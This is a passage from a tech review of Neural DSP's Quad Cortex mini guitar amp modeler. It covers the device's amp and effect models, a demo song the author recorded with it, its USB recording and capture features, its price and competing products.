Neural has published a massive and quite helpful list of all the gear on offer here. Bogner Shiva? Marshall? Mesa Boogie? Matchless? Soldano? Vox? Fender? Hiwatt? Amps from all these companies are included. Need a bass amp? There are 13 of those, too. What about a bass overdrive? You get five. A general reverb? How about 17? You get the idea.

You can loop, filter, distort, EQ, delay, and compress to your heart’s content, though there seems to be a bit more emphasis here on rock and metal styles (which Neural DSP is most known for) than on other offerings. Still, there’s enough variety to offer great tools for funk, blues, jazz, and country players. You can even add in a version of the monosynth found in the company’s Rabea plugin.

To illustrate some of the sounds on offer, I wrote a little song about a dirtbag billionaire who makes rockets, gets chased off the Earth by angry locals, and ends up crashing his ship into the Moon out of despair. It’s called “Master of the Universe.”

More to the point, it features 10-plus electric guitar tracks recorded through the Quad Cortex mini using shimmer reverb, the poly octaver, and various crunchy rhythm and lead sounds. (I avoided the metal tones so common in Neural DSP demos.) Bass guitar was likewise recorded through one of the mini’s bass presets.

(For those new to audio production and curious about the other sounds in the track, the drums are the Abbey Road 70s kit, while the rocket-sounding “riser” comes from the Rise and Hit collection, both from Native Instruments. The piano is the recently upgraded “studio piano” that comes in Logic Pro and now sounds surprisingly good! There’s also a Hammond organ emulation and a Rhodes piano emulation from Universal Audio buried in the mix. The double-tracked acoustic guitars during two of the choruses were recorded live in my home studio with a single condenser mic. For room ambience throughout, but especially on the drums, I used Universal Audio’s excellent Sound City Studios plugin.)

I’ve generally found Neural’s plugin tones to be pretty “mix-ready,” and that’s true here as well. Though I often needed to roll off some low end or make an occasional EQ boost or add a bit of reverb to blend the guitars spatially with the drum ambience, little else was required but panning and fader moves.

Frankly, there are probably too many parts in the song, but the Quad Cortex mini was just such a playground of sounds that I kept finding new little bits I wanted to work in. Just be grateful that I talked myself out of using all of the insane pitch-shift effects on my vocal for “special” moments.

“Master of the Universe,” my demo song showing some of what the Quad Cortex mini can do.

Captured

When it comes to recording, you don’t have to worry about wiring this thing up to your audio interface; just connect it to your computer with a USB-C cable, and it becomes a 24-bit, 48 KHz interface. (On Macs, this is class compliant and needs no driver; it even works with iOS devices. Neural makes the necessary driver for Windows.)

The Quad Cortex mini shows up with a host of inputs, making it simple to record, say, both a dry electric guitar track and a heavily effected one at the same time. If you change your mind about the sound later, you can always “re-amp” the dry signal by routing it back out to the device and recording it with different settings. You can even track mics through this thing, thanks to an XLR input and (for condenser mics) support for phantom power.

The Quad Cortex mini can also make its own captures of gear you either own or happen across. This can happen in two ways: 1) on the device or 2) in the cloud.

The device-based system, which the company calls “Neural Capture Version 1,” requires you to hook up your gear to both an output (to play the system’s test tones) and an input on the mini. (Note: Do not, under ANY circumstances, connect the actual speaker outputs from a tube amp directly to the mini. The power level is far too high.)

Various known sounds are then played through this loop, and the mini’s software analyzes the differences between the sound it sent and the sound it received. The machine-learning algorithms for this run locally on the device. Neural says that the Capture 1 system can handle overdrive pedals, amps, and cabs.

The newer system, called Neural Capture Version 2, is “an advanced evolution of Neural Capture trained via Cortex Cloud,” says the company. “This option provides even higher-resolution Captures, making it especially powerful for touch-sensitive devices like fuzzes, compressors, and certain styles of amps.” Capture 2 is said to be capable of modeling “subtle behaviors like volume-knob cleanup, amp sag and bloom, fast transients, and blend controls.”

As the name suggests, the more powerful algorithms behind this system require cloud-based servers instead of the local device. Users are allowed to run 40 Neural Capture 2 sessions per day, and each takes around 10 minutes.

The resulting captures, along with any presets you want to share, can be uploaded to Neural’s cloud-based system for sharing them. Once you log in, any captures or presets you choose to download from the site will automatically show up in your Quad Cortex mini.

Look for a follow-up article on what the actual process of making a capture is like; it’s similar across many different modeling devices these days, though the sound of the resulting models can vary by company.

Screenshot of The Cortex Cloud website.

The Cortex Cloud website.

The Cortex Cloud website.

Options

The Quad Cortex mini is a powerful tone platform that is both versatile and expandable. It’s good for solo jamming at home without needing to 1) buy amps, cabs, and effects and 2) crank them to ruinous volume levels. It’s good for playing live, once you have configured its fairly deep control system in a way that works for your particular songs. And it’s good for recording, letting you fiddle with endless gear combinations without running a single patch cable or digging up a 9V battery.

At $1,400, though, it’s bad for your wallet. Whether it’s worth the cost depends on your use case. If you don’t need a screen and are happy with fewer ports and options, you might consider Neural DSP’s smaller and cheaper Nano Cortex ($570) or other devices like the Tonex pedals from IK Multimedia. On the other hand, if you want a larger unit with more footswitches, you can plonk down an extra $400 for the full-fat Quad Cortex or look into various options from Fractal, Kemper, Line 6, etc.

One way of thinking about the financial calculus here would be to try out the device (or listen online) and see how well the sound works for you. Some amp purists believe that nothing beats the sound of real tubes and real speakers in a real room, cost and weight and volume be damned. Many others can’t hear a difference between the models and the originals.

If you’re in the former group, these kinds of devices are unlikely to fully satisfy you, at least when it comes to gigging and recording. So you might decide whether they are “worth it” based solely on their value as easy, light, and quiet practice platforms.

If you can’t tell (or don’t care about) the difference between the models and the real hardware, then these modeling sims start to look like a far better value. When individual amps can go for $1,500 to $2,000 or more, a massive gear collection like the one in the Quad Cortex mini is practically saving you money. You’d be a fool not to buy! (To paraphrase an explanation my son once gave me for a purchase he wanted to make.)

But even those in this group may not need an actual hardware pedal unless they really enjoy practicing without needing to use their regular computer—or unless they gig regularly. If you’re simply a recording guitarist who tends to work “in the box,” you might just pick up some cheaper Neural DSP plugins instead. Or you can buy a more comprehensive software suite like the new Paradise Guitar Studio from Universal Audio or one of the offerings from PolychromeDSP—all of which sound excellent.

If you’re content with software but want a free alternative, take a look at NAM, the Neural Amp Modeler. It’s open source modeling tech that also offers a community tone-sharing website and has been racking up lots of great reviews for its sound quality. (Though note that most of the NAM models are static captures; they sound great but represent only that exact setup and knob positioning, though the developers are working on more complex, adjustable models.)

All types of users can probably admit, though, that hardware and software modeling tech has made this a great time to be a guitar or bass player. Even if you don’t want to use them on a record, just being able to play around with and get to know this much gear with this much accuracy is a huge win for the home hobbyist and small-time gigging musician, who would otherwise never even set eyes on most of this stuff.

The key thing is just to get whatever works for you… and then to go forth and rock.

Photo of Nate Anderson

Quad Cortex mini amp modeler: All the power, half the size Read More »